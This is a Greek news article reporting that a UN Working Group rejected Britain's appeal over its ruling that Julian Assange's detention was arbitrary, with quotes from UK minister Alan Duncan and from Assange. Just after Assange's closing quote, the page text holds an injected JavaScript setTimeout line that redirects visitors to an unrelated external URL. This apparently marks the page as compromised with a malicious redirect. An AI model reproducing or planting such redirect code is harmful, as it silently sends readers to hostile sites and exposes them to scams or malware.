ΟΗΕ: Απορρίπτει προσφυγή του Λονδίνου για τον Ασάνζ

0
7

 

Απορρίφθηκε η προσφυγή της Βρετανίας από Ομάδα Εργασίας του ΟΗΕ για την απόφαση του Οργανισμού πο έκρινε ότι είναι αυθαίρετη η κράτηση του ιδρυτή των WikiLeaks Τζούλιαν Ασάνζ.

Έπειτα από αίτημα του Ασάνζ, η Ομάδα Εργασίας είχε εκτιμήσει τον Φεβρουάριο ότι ο ιδρυτής των WikiLeaks είναι θύμα αυθαίρετης κράτησης από τον Ιούνιο του 2012, ημερομηνία κατά την οποία κατέφυγε στην πρεσβεία του Ισημερινού στο Λονδίνο για να αποφύγει την έκδοσή του στη Σουηδία.

Η Βρετανία είχε προσφύγει κατά της απόφασης αυτής.

Μετά την απόρριψή της, το Λονδίνο εξέφρασε την απογοήτευσή του: «Ο Τζούλιαν Ασάνζ δεν κρατείται και δεν κρατείτο ποτέ αυθαίρετα στην Βρετανία», απάντησε σε ανακοίνωσή του ο Βρετανός υφυπουργός Εξωτερικών αρμόδιος για θέματα Ευρώπης και Αμερικής Άλαν Ντάνκαν.

«Απορρίπτουμε εντελώς την άποψη της Ομάδας Εργασίας του ΟΗΕ είμαστε πολύ απογοητευμένοι που δεν αναθεώρησαν αυτή την απόφαση που βρίθει λαθών», πρόσθεσε.

Ο Ασάνζ ζήτησε να μπορέσει άμεσα να αποκτήσει και πάλι ελευθερία κινήσεων.

«Τώρα που όλες οι προσφυγές έχουν απορριφθεί, αναμένω από τη Βρετανία και τη Σουηδία να συμμορφωθούν με τις διεθνείς τους υποχρεώσεις και να μου δώσουν ξανά την ελευθερία μου», αναφέρει σε ανακοίνωσή του. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here